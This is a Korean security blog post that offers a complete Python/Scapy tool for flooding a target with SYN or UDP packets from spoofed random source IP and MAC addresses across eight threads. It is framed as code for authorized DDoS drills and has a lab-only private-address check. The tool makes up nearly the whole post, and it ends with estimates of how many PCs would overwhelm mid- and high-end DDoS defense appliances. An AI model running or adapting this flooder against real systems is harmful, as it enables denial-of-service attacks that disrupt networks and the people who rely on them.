본문 바로가기
정보보안 월드/정보보안 이야기

Multi-Threaded SYN/UDP Flood Simulator for DDoS Defense Testing

by 레드추파 2025. 9. 3.
728x90
반응형

 

Multi-Threaded SYN/UDP Flood Simulator for DDoS Defense Testing

 

 

 

아래 코드는 DDoS 모의 훈련용 코드입니다. 악의적으로 사용하면 문제가 발생하므로, 허가받은 환경에서 점검용으로만 사용하시기 바랍니다.

 

DDoS 모의훈련 공격 코드

scapy syn flooding.py
0.01MB

 

import random
import time
import threading
import itertools
from scapy.all import Ether, IP, TCP, UDP, RandString, RandIP, sendp, conf
import logging
from concurrent.futures import ThreadPoolExecutor
import queue
import sys
import os

# Lower Scapy's verbosity
conf.verb = 0

# Logging configuration: every record carries a timestamp and the id of the
# thread that emitted it
logging.basicConfig(level=logging.INFO, format='%(asctime)s [Thread %(thread)d] %(message)s')

# List of common ports; main() uses it as the pool of destination ports
COMMON_PORTS = [22, 80, 443, 8080, 3389, 53, 21, 23, 445, 1433]

def check_privileges():
    """Exit with status 1 unless the process has administrator rights.

    On POSIX systems the effective user id must be 0. On Windows the shell
    API ``IsUserAnAdmin`` must report true. On any other ``os.name`` no check
    is performed.

    Raises:
        SystemExit: with code 1 when the required privileges are missing.
    """
    if os.name == 'posix':
        if os.geteuid() != 0:
            logging.error("This script requires root privileges on Linux (sudo).")
            sys.exit(1)
    elif os.name == 'nt':
        # Imported here so the check does not depend on the script entry
        # point having bound ``ctypes`` as a module global beforehand.
        import ctypes

        if not ctypes.windll.shell32.IsUserAnAdmin():
            logging.error("This script requires Administrator privileges on Windows.")
            sys.exit(1)

def random_mac():
    """Return a random MAC address as six colon-separated hex octets.

    Each octet is drawn independently with ``random.randint(0, 255)`` and
    rendered as two lowercase hexadecimal digits.
    """
    octets = (f"{random.randint(0, 255):02x}" for _ in range(6))
    return ":".join(octets)

def random_ip():
    """Return one concrete source IP value drawn from Scapy's ``RandIP``."""
    generator = RandIP()
    # _fix() resolves the volatile Scapy value into a single fixed value.
    return generator._fix()

def craft_packet(target_ip, target_port, attack_type='syn'):
    """Build one Scapy frame addressed to ``target_ip``:``target_port``.

    Args:
        target_ip: Value used as the IP destination.
        target_port: Value used as the TCP/UDP destination port.
        attack_type: ``'syn'`` for a TCP segment with the SYN flag, or
            ``'udp'`` for a UDP datagram with a random payload.

    Returns:
        ``Ether / IP / TCP`` for ``'syn'``, ``Ether / IP / UDP / payload`` for
        ``'udp'``, or ``None`` when ``attack_type`` is not recognised or any
        exception is raised while building the frame (the error is logged).
    """
    try:
        # Layer 2: random source MAC, broadcast destination MAC
        eth = Ether(src=random_mac(), dst="ff:ff:ff:ff:ff:ff")
        # Layer 3: random source address, TTL picked between 64 and 128
        ip = IP(src=random_ip(), dst=target_ip, ttl=random.randint(64, 128))
        
        if attack_type == 'syn':
            # Source port, sequence number, window and MSS are all randomised
            tcp = TCP(
                sport=random.randint(1024, 65535),
                dport=target_port,
                flags='S',
                seq=random.randint(0, 4294967295),
                window=random.randint(1024, 65535),
                options=[('MSS', random.randint(500, 1460))]
            )
            return eth / ip / tcp
        elif attack_type == 'udp':
            udp = UDP(
                sport=random.randint(1024, 65535),
                dport=target_port
            )
            # Random payload, size chosen between 20 and 500
            payload = RandString(size=random.randint(20, 500))
            return eth / ip / udp / payload
        else:
            logging.warning(f"Unknown attack type: {attack_type}")
            return None
    except Exception as e:
        logging.error(f"Error crafting packet: {str(e)}")
        return None

def attack_worker(target_ip, target_ports, duration, packet_rate, thread_id, attack_type, pkt_queue, iface):
    """Send crafted packets in a loop until ``duration`` seconds have elapsed.

    Args:
        target_ip: Destination address handed to ``craft_packet``.
        target_ports: Sequence from which one destination port is picked at
            random for every packet.
        duration: How long the loop runs, in seconds.
        packet_rate: Used both as the progress-log interval (in packets) and
            to derive the pause between iterations (``1 / packet_rate``).
        thread_id: Identifier included in this worker's error messages.
        attack_type: Passed through to ``craft_packet``.
        pkt_queue: Queue that receives one item per packet sent.
        iface: Interface passed to ``sendp``.
    """
    end_time = time.time() + duration
    count = 0
    # Spinner characters appended to the progress log lines
    visual = itertools.cycle(["-", "\\", "|", "/"])
    
    while time.time() < end_time:
        try:
            target_port = random.choice(target_ports)
            packet = craft_packet(target_ip, target_port, attack_type)
            if packet:
                sendp(packet, iface=iface, verbose=0)
                count += 1
                # One queue item per sent packet; monitor_progress tallies them
                pkt_queue.put(1)
                
                # Log progress once every packet_rate packets
                if count % packet_rate == 0:
                    logging.info(f"Sent {count} packets {next(visual)}")
            
            # NOTE(review): a packet_rate of 0 raises ZeroDivisionError here
            # (or at the modulo above); the except below catches it, so the
            # loop only logs errors until end_time.
            time.sleep(1 / packet_rate)
        except Exception as e:
            logging.error(f"Error in thread {thread_id}: {str(e)}")
            time.sleep(0.1)  # back off briefly after an error
    
    logging.info(f"Finished. Total packets sent: {count}")

def _drain_count(pkt_queue):
    """Remove every item currently in ``pkt_queue`` and return how many were removed."""
    drained = 0
    while True:
        try:
            pkt_queue.get_nowait()
        except queue.Empty:
            return drained
        drained += 1


def monitor_progress(pkt_queue, duration):
    """Tally the items workers put on ``pkt_queue`` and log a running total.

    The queue is drained through its own locked ``get_nowait`` API, so an item
    enqueued while the tally is being taken is never discarded uncounted. A
    final drain after the loop picks up items that arrived during the last
    sleep.

    Args:
        pkt_queue: ``queue.Queue`` receiving one item per sent packet.
        duration: How long to keep monitoring, in seconds.

    Returns:
        The total number of items counted.
    """
    total_packets = 0
    deadline = time.time() + duration

    while time.time() < deadline:
        try:
            # Sleep first so a failure in the tally cannot turn into a busy loop.
            time.sleep(1)
            total_packets += _drain_count(pkt_queue)
            logging.info(f"Total packets sent across all threads: {total_packets}")
        except Exception as e:
            logging.error(f"Monitor error: {str(e)}")

    # Count whatever was enqueued after the last in-loop drain.
    total_packets += _drain_count(pkt_queue)
    logging.info(f"Final count - Total packets sent: {total_packets}")
    return total_packets

def main():
    """Run one simulation session using the hard-coded lab settings.

    Checks that the target is a private (lab) address and that the process
    has administrator rights, then starts the monitor thread and the worker
    pool, and waits for both to finish.

    Raises:
        SystemExit: with code 1 when the target address is invalid or not
            private, or when ``check_privileges`` rejects the current user.
    """
    import ipaddress  # only needed for the lab-only guard below

    # Settings
    target_ip = "192.168.1.113"  # lab environment IP
    target_ports = COMMON_PORTS
    duration = 20  # test time (seconds)
    packet_rate = 500  # packets per second
    num_threads = 8  # number of threads
    attack_type = random.choice(['syn', 'udp'])  # single attack type
    iface = conf.iface  # use the default network interface

    # Lab-only guard: the target is documented as a lab address, so refuse
    # anything outside private address space before any thread is started.
    try:
        target_is_private = ipaddress.ip_address(target_ip).is_private
    except ValueError:
        logging.error(f"Invalid target IP address: {target_ip}")
        sys.exit(1)
    if not target_is_private:
        logging.error(f"Refusing to run: {target_ip} is not a private (lab) address.")
        sys.exit(1)

    # Privilege check
    check_privileges()

    # Report the network interface in use
    logging.info(f"Using network interface: {iface}")

    # Queue used for packet counting
    pkt_queue = queue.Queue()

    # Start the monitoring thread
    monitor = threading.Thread(target=monitor_progress, args=(pkt_queue, duration))
    monitor.start()

    # Start the worker threads; leaving the with-block waits for all of them
    with ThreadPoolExecutor(max_workers=num_threads) as executor:
        for i in range(num_threads):
            executor.submit(
                attack_worker,
                target_ip,
                target_ports,
                duration,
                packet_rate,
                i+1,
                attack_type,
                pkt_queue,
                iface
            )

    # Wait for the monitoring thread to finish
    monitor.join()

    print("[!] 🎯 DDoS Simulation complete. No real network harm done.")

# Script entry point: run main() and report interruption or fatal errors.
if __name__ == "__main__":
    try:
        # Binds ctypes as a module global; check_privileges() references it
        # on its Windows branch.
        import ctypes
        main()
    except KeyboardInterrupt:
        print("\n[!] Simulation interrupted by user")
    except Exception as e:
        print(f"[!] Fatal error occurred: {str(e)}")

 


중급 방어 장비(1M PPS, 10Gbps): 

약 20~50대의 PC로 무력화 가능. 

 

 

고급 방어 장비(10M PPS, 100Gbps): 

약 200~500대의 PC로 무력화 가능.

 

 

WireShark 패킷 캡처 필터

728x90
반응형